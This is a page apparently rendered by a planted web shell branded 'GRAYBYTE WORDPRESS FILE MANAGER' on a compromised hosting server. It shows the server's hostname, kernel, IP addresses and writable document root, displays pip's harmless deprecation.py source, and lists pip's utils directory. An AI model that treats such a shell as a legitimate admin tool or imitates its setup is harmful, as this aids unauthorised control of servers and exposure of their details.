✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ premium290.web-hosting.com ​🇻​♯➤ 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 63.250.38.37 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.105
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /usr/lib/python2.7/site-packages/pip/utils//deprecation.py
"""
A module that implements tooling to enable easy warnings about deprecations.
"""
from __future__ import absolute_import

import logging
import warnings


class PipDeprecationWarning(Warning):
    pass


class Pending(object):
    pass


class RemovedInPip10Warning(PipDeprecationWarning):
    pass


class RemovedInPip11Warning(PipDeprecationWarning, Pending):
    pass


class Python26DeprecationWarning(PipDeprecationWarning):
    pass


# Warnings <-> Logging Integration


_warnings_showwarning = None


def _showwarning(message, category, filename, lineno, file=None, line=None):
    if file is not None:
        if _warnings_showwarning is not None:
            _warnings_showwarning(
                message, category, filename, lineno, file, line,
            )
    else:
        if issubclass(category, PipDeprecationWarning):
            # We use a specially named logger which will handle all of the
            # deprecation messages for pip.
            logger = logging.getLogger("pip.deprecations")

            # This is purposely using the % formatter here instead of letting
            # the logging module handle the interpolation. This is because we
            # want it to appear as if someone typed this entire message out.
            log_message = "DEPRECATION: %s" % message

            # PipDeprecationWarnings that are Pending still have at least 2
            # versions to go until they are removed so they can just be
            # warnings.  Otherwise, they will be removed in the very next
            # version of pip. We want these to be more obvious so we use the
            # ERROR logging level.
            if issubclass(category, Pending):
                logger.warning(log_message)
            else:
                logger.error(log_message)
        else:
            _warnings_showwarning(
                message, category, filename, lineno, file, line,
            )


def install_warning_logger():
    # Enable our Deprecation Warnings
    warnings.simplefilter("default", PipDeprecationWarning, append=True)

    global _warnings_showwarning

    if _warnings_showwarning is None:
        _warnings_showwarning = warnings.showwarning
        warnings.showwarning = _showwarning


Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
3 Mar 2024 8.23 PM
root / root
0755
__init__.py
26.55 KB
21 Apr 2022 6.08 PM
root / root
0644
__init__.pyc
27.075 KB
21 Apr 2022 6.08 PM
root / root
0644
__init__.pyo
27.018 KB
21 Apr 2022 6.08 PM
root / root
0644
appdirs.py
8.604 KB
21 Apr 2022 6.08 PM
root / root
0644
appdirs.pyc
8.405 KB
21 Apr 2022 6.08 PM
root / root
0644
appdirs.pyo
8.405 KB
21 Apr 2022 6.08 PM
root / root
0644
build.py
1.281 KB
21 Apr 2022 6.08 PM
root / root
0644
build.pyc
1.679 KB
21 Apr 2022 6.08 PM
root / root
0644
build.pyo
1.679 KB
21 Apr 2022 6.08 PM
root / root
0644
deprecation.py
2.18 KB
21 Apr 2022 6.08 PM
root / root
0644
deprecation.pyc
2.263 KB
21 Apr 2022 6.08 PM
root / root
0644
deprecation.pyo
2.263 KB
21 Apr 2022 6.08 PM
root / root
0644
encoding.py
0.948 KB
21 Apr 2022 6.08 PM
root / root
0644
encoding.pyc
1.252 KB
21 Apr 2022 6.08 PM
root / root
0644
encoding.pyo
1.252 KB
21 Apr 2022 6.08 PM
root / root
0644
filesystem.py
0.878 KB
21 Apr 2022 6.08 PM
root / root
0644
filesystem.pyc
0.762 KB
21 Apr 2022 6.08 PM
root / root
0644
filesystem.pyo
0.762 KB
21 Apr 2022 6.08 PM
root / root
0644
glibc.py
2.87 KB
21 Apr 2022 6.08 PM
root / root
0644
glibc.pyc
1.783 KB
21 Apr 2022 6.08 PM
root / root
0644
glibc.pyo
1.783 KB
21 Apr 2022 6.08 PM
root / root
0644
hashes.py
2.799 KB
21 Apr 2022 6.08 PM
root / root
0644
hashes.pyc
3.868 KB
21 Apr 2022 6.08 PM
root / root
0644
hashes.pyo
3.868 KB
21 Apr 2022 6.08 PM
root / root
0644
logging.py
3.249 KB
21 Apr 2022 6.08 PM
root / root
0644
logging.pyc
4.729 KB
21 Apr 2022 6.08 PM
root / root
0644
logging.pyo
4.729 KB
21 Apr 2022 6.08 PM
root / root
0644
outdated.py
5.849 KB
21 Apr 2022 6.08 PM
root / root
0644
outdated.pyc
5.547 KB
21 Apr 2022 6.08 PM
root / root
0644
outdated.pyo
5.547 KB
21 Apr 2022 6.08 PM
root / root
0644
packaging.py
2.031 KB
21 Apr 2022 6.08 PM
root / root
0644
packaging.pyc
2.403 KB
21 Apr 2022 6.08 PM
root / root
0644
packaging.pyo
2.403 KB
21 Apr 2022 6.08 PM
root / root
0644
setuptools_build.py
0.271 KB
21 Apr 2022 6.08 PM
root / root
0644
setuptools_build.pyc
0.339 KB
21 Apr 2022 6.08 PM
root / root
0644
setuptools_build.pyo
0.339 KB
21 Apr 2022 6.08 PM
root / root
0644
ui.py
11.325 KB
21 Apr 2022 6.08 PM
root / root
0644
ui.pyc
11.409 KB
21 Apr 2022 6.08 PM
root / root
0644
ui.pyo
11.341 KB
21 Apr 2022 6.08 PM
root / root
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF